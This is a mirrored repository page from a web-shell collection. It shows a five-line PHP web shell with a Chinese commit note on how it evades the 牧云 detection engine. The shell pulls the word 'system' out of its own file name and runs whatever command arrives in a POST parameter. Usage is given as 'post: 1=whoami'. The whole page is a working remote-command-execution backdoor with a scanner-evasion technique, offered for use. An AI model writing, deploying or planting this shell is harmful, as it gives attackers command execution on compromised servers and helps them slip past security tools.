mirror of
https://github.com/tennc/webshell
synced 2024-11-25 12:40:17 +00:00
a5b681ccf8
from: https://zhuanlan.zhihu.com/p/550150061 __FILE__是PHP的一个魔术常量,它会返回当前执行PHP脚本的完整路径和文件名,我们利用substr()函数逆着截取,就能获得system再利用变量做函数的方式,打断了污点追踪的过程,进行命令执行,也可以成功bypass掉牧云引擎。 usage: file:xxx.php post: body==>1=whoami
5 lines
128 B
PHP
5 lines
128 B
PHP
<?php
|
|
//bypass 牧云 文件名需要设置为system
|
|
$filename=substr(__FILE__,-10,6);
|
|
$command=$_POST[1];
|
|
$filename($command);
|